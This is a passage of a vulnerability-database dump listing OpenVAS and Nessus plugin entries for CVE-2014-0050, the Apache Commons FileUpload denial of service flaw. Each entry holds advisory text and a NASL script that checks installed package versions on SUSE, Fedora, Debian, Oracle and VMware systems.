infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) )\n exit( 0 );\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif( version_in_range( version:vers, test_version:\"7.0.0\", test_version2:\"7.0.50\" ) ||\n version_in_range( version:vers, test_version:\"8.0.0.RC1\", test_version2:\"8.0.1\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"7.0.51/8.0.2\", install_path:path );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:37:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "The remote host is missing an update for the 'jakarta-commons-fileupload' package(s) announced via the referenced advisory.", "modified": "2020-01-31T00:00:00", "published": "2015-10-13T00:00:00", "id": "OPENVAS:1361412562310850747", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850747", "type": "openvas", "title": "SUSE: Security Advisory for jakarta-commons-fileupload (SUSE-SU-2014:0548-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850747\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 18:35:00 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for jakarta-commons-fileupload (SUSE-SU-2014:0548-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jakarta-commons-fileupload'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update fixes a security issue with\n jakarta-commons-fileupload:\n\n * bnc#862781: denial of service due to too-small buffer\n size used (CVE-2014-0050)\n\n Security Issue reference:\n\n * CVE-2014-0050\");\n\n script_tag(name:\"affected\", value:\"jakarta-commons-fileupload on SUSE Linux Enterprise Server 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0548-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", 
\"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLES11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"jakarta-commons-fileupload\", rpm:\"jakarta-commons-fileupload~1.1.1~1.37.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"jakarta-commons-fileupload-javadoc\", rpm:\"jakarta-commons-fileupload-javadoc~1.1.1~1.37.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "Check for the Version of apache-commons-fileupload", "modified": "2017-07-10T00:00:00", "published": "2014-02-20T00:00:00", "id": "OPENVAS:867519", "href": "http://plugins.openvas.org/nasl.php?oid=867519", "type": "openvas", "title": "Fedora Update for apache-commons-fileupload FEDORA-2014-2183", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2183\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867519);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:05:45 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2183\");\n\n tag_insight = \"The javax.servlet package lacks support for rfc 1867, html file\nupload. This package provides a simple to use api for working with\nsuch data. 
The scope of this package is to create a package of Java\nutility classes to read multipart/form-data within a\njavax.servlet.http.HttpServletRequest\n\";\n\n tag_affected = \"apache-commons-fileupload on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2183\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128505.html\");\n script_summary(\"Check for the Version of apache-commons-fileupload\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "The remote host is missing an update for the 'apache-commons-fileupload' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2014-02-20T00:00:00", "id": "OPENVAS:1361412562310867519", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867519", "type": "openvas", "title": "Fedora Update 
for apache-commons-fileupload FEDORA-2014-2183", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2183\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867519\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:05:45 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2183\");\n script_tag(name:\"affected\", value:\"apache-commons-fileupload on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", 
value:\"2014-2183\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128505.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache-commons-fileupload'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.", "modified": "2019-03-19T00:00:00", "published": "2014-02-07T00:00:00", "id": "OPENVAS:1361412562310702856", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702856", "type": "openvas", "title": "Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2856.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 2856-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks 
GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702856\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-0050\");\n script_name(\"Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-07 00:00:00 +0100 (Fri, 07 Feb 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2856.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"libcommons-fileupload-java on Debian Linux\");\n 
script_tag(name:\"solution\", value:\"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.2.2-1+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.2-1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.1-1.\n\nWe recommend that you upgrade your libcommons-fileupload-java packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "The remote host is missing an update for the 'apache-commons-fileupload' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2014-02-20T00:00:00", "id": "OPENVAS:1361412562310867523", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310867523", "type": "openvas", "title": "Fedora Update for apache-commons-fileupload FEDORA-2014-2175", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2175\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867523\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:08:39 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2175\");\n script_tag(name:\"affected\", value:\"apache-commons-fileupload on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", 
value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-2175\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128499.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache-commons-fileupload'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050", "CVE-2014-6483"], "description": "This host is running Oracle Database Server\n and is prone to multiple unspecified vulnerabilities.", "modified": "2018-10-24T00:00:00", "published": "2016-01-25T00:00:00", "id": "OPENVAS:1361412562310807039", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807039", "type": "openvas", "title": "Oracle Database Server Multiple Unspecified Vulnerabilities -07 Jan16", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_db_mult_unspecified_vuln07_jan16.nasl 12047 2018-10-24 07:38:41Z cfischer $\n#\n# Oracle Database Server Multiple Unspecified 
Vulnerabilities -07 Jan16\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:oracle:database_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807039\");\n script_version(\"$Revision: 12047 $\");\n script_cve_id(\"CVE-2014-6483\", \"CVE-2014-0050\");\n script_bugtraq_id(65400, 70480);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-24 09:38:41 +0200 (Wed, 24 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-25 14:59:25 +0530 (Mon, 25 Jan 2016)\");\n script_name(\"Oracle Database Server Multiple Unspecified Vulnerabilities -07 Jan16\");\n\n script_tag(name:\"summary\", value:\"This host is running Oracle Database Server\n and is prone to multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to multiple\n unspecified vulnerabilities in the Application Express component.\");\n\n 
script_tag(name:\"impact\", value:\"Successfully exploitation will allow remote\n authenticated attackers to affect confidentiality, integrity, and availability\n via unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"Oracle Database Server version\n before 4.2.6\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_dependencies(\"oracle_tnslsnr_version.nasl\");\n script_mandatory_keys(\"OracleDatabaseServer/installed\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!dbPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dbVer = get_app_version(cpe:CPE, port:dbPort)){\n exit(0);\n}\n\nif(version_is_less(version:dbVer, test_version:\"4.2.6\"))\n{\n report = report_fixed_ver(installed_version:dbVer, fixed_version:\"Apply the appropriate patch\");\n security_message(data:report, port:dbPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T07:00:05", "description": "The version of VMware vCenter Orchestrator Appliance installed on the\nremote host is 5.5.x prior to 5.5.2. 
It is, therefore, affected by a\ndenial of service vulnerability due to an error that exists in the\nincluded Apache Tomcat version related to handling 'Content-Type' HTTP\nheaders and multipart requests.", "edition": 26, "published": "2014-10-24T00:00:00", "title": "VMware vCenter Orchestrator Appliance 5.5.x < 5.5.2 DoS (VMSA-2014-0007)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_orchestrator"], "id": "VMWARE_ORCHESTRATOR_APPLIANCE_VMSA_2014_0007.NASL", "href": "https://www.tenable.com/plugins/nessus/78670", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78670);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"VMSA\", value:\"2014-0007\");\n\n script_name(english:\"VMware vCenter Orchestrator Appliance 5.5.x < 5.5.2 DoS (VMSA-2014-0007)\");\n script_summary(english:\"Checks the version of VMware vCenter Orchestrator Appliance.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Orchestrator Appliance installed on the\nremote host is 5.5.x prior to 5.5.2. 
It is, therefore, affected by a\ndenial of service vulnerability due to an error that exists in the\nincluded Apache Tomcat version related to handling 'Content-Type' HTTP\nheaders and multipart requests.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0007.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Orchestrator 5.5.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0050\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_orchestrator\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vCenter Orchestrator/Version\", \"Host/VMware vCenter Orchestrator/VerUI\", \"Host/VMware vCenter Orchestrator/Build\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/Version\");\nverui = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/VerUI\");\n\nif (version =~ '^5\\\\.5\\\\.')\n{\n build = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/Build\");\n if (int(build) < 1992027)\n {\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + verui +\n '\\n Fixed version : 5.5.2 Build 1992027' + \n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n }\n}\n\naudit(AUDIT_INST_VER_NOT_VULN, 'VMware vCenter Orchestrator Appliance', verui);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:14:08", "description": "Updated Red Hat JBoss Enterprise Application Platform 6.2.1 packages\nthat fix one security issue are now available for Red Hat Enterprise\nLinux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA denial of service flaw was found in the way Apache Commons\nFileUpload, which is embedded in the JBoss Web component of JBoss EAP,\nhandled small-sized buffers used by MultipartStream. 
A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing JBoss Web to enter an infinite loop when\nprocessing such an incoming request. (CVE-2014-0050)\n\nWarning: Before applying this update, back up your existing Red Hat\nJBoss Enterprise Application Platform installation and deployed\napplications.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.2.1 on\nRed Hat Enterprise Linux 5 and 6 are advised to upgrade to these\nupdated packages. The JBoss server process must be restarted for the\nupdate to take effect.", "edition": 26, "published": "2014-03-06T00:00:00", "title": "RHEL 5 / 6 : JBoss EAP (RHSA-2014:0253)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-03-06T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:jbossweb"], "id": "REDHAT-RHSA-2014-0253.NASL", "href": "https://www.tenable.com/plugins/nessus/72853", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0253. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72853);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"RHSA\", value:\"2014:0253\");\n\n script_name(english:\"RHEL 5 / 6 : JBoss EAP (RHSA-2014:0253)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated Red Hat JBoss Enterprise Application Platform 6.2.1 packages\nthat fix one security issue are now available for Red Hat Enterprise\nLinux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References 